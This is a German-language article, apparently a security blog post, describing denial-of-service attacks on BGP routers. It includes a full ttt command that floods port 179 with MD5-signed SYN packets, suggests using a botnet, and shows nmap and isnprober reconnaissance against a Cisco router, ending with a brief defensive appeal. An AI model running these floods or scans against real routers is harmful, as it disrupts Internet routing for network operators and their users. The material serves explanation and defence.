"Blinde" DoS-Angriffe auf BGP-Router.
Blind werden wir diese Angriffe nennen, die außer der IP-Adresse des BGP-Routers kein zusätzliches Wissen erfordern. Das einfachste Szenario eines solchen DoS-Angriffs ist SYN flood auf TCP-Port 179. Um einen solchen Angriff auf einen Industrierouter zu implementieren, müssen Sie mehrere Dutzend Computer verwenden, besser ein Botnetz.
Eine interessantere Möglichkeit, einen BGP-Zielrouter mit MD5-Authentifizierung zu «überschwemmen», besteht darin, SYN-TCP-Pakete mit MD5-Signaturen zu verwenden. Dieser Angriff ermöglicht es, der Verarbeitung von MD5 durch den angegriffenen Router eine Rechenlast hinzuzufügen.
Ein solcher Angriff ist mit dem Dienstprogramm ttt mit der Option md5 einfach durchzuführen. Um die Überflutung zu optimieren, müssen mehrere Instanzen von ttt auf mehreren Dutzend Maschinen ausgeführt werden.
Hier ist ein Beispiel für die Verwendung des Dienstprogramms ttt:
arhontus# ./ttt --flood 10000000 -y 11006 --syn --md5
allyourbgparebelongtous -D 192.168.66.191 && ./ttt --flood 10000000 -y
179 --syn --md5 allyourbgparebelongtous -D 192.168.66.191
Wenn wir über die Hardware von Cisco Systems sprechen, sollten wir die Möglichkeit erwähnen, Angriffe auf den TCP / IP-Stapelüberlauf von IOS zu implementieren. Sie können Schwachstellenscanner wie Nmap, hping2 und isnprober verwenden, um solche Schwachstellen zu identifizieren.
Hier ist ein Beispiel für einen Cisco 2600 Router:
kali# nmap -sS -O -vvvv 192.168.66.215
<skip>
TCP Sequence Prediction: class="truly" random
Difficulty=9999999 (Good luck!)
TCP ISN Seq. Numbers: 5142798B A95D7AC9 71F42B5A 4D684349 FF2B94D4 B764FD5C
<skip> arhontus# # perl isnprober.pl -n 10 -i eth0 -p 23 192.168.66.215
-- ISNprober / 1.02 / Tom Vandepoel (Tom.Vandepoel@ubizen.com) --
Using eth0:192.168.77.5
Probing host: 192.168.66.215 on TCP port 23.
Host:port ISN Delta
192.168.66.202:23 -1154503313
192.168.66.202:23 -24125463 1130377850
192.168.66.202:23 2031059534 2055184997
192.168.66.202:23 965205234 -1065854300
192.168.66.202:23 -1974685094 -2939890328
192.168.66.202:23 1760147902 3734832996
192.168.66.202:23 2089287258 329139356
192.168.66.202:23 -923724721 -3013011979
192.168.66.202:23 -934490140 -10765419
192.168.66.202:23 -1262713275 -328223135
Im Allgemeinen ist das BGP-Routingprotokoll Version 4 ein wesentlicher Bestandteil des modernen Internets, und daher werden sich Probleme bei der Arbeit dieses Protokolls sicherlich auf das Funktionieren des globalen Netzwerks auswirken. Wenn also der Systemadministrator die Wartung von BGP-Routern (in der Regel Dienstleistungsunternehmen) übernimmt, müssen Sie mögliche Bedrohungen ernst nehmen und im Voraus Maßnahmen ergreifen, um sie zu schützen.
Oleg Petukhov, Rechtsanwalt im Bereich des Völkerrechts und des Schutzes personenbezogener Daten, Spezialist für Informationstechnik sicherheit, Schutz von Informationen und persönlichen Daten.
Telegramm-Kanal: https://t.me/datenschutzmit
Die Gruppe im Telegramm: https://t.me/datenschutzmit1
Website: https://legascom.ru
E-Mail: online@legascom.ru
#informationssicherheit #informationssicherheit




